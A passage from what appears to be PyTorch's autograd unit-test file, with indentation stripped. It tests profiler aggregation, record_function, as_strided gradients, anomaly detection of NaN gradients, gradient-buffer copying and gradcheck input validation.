self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
_format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and fail numerical Jacobian check consequently
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward0")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
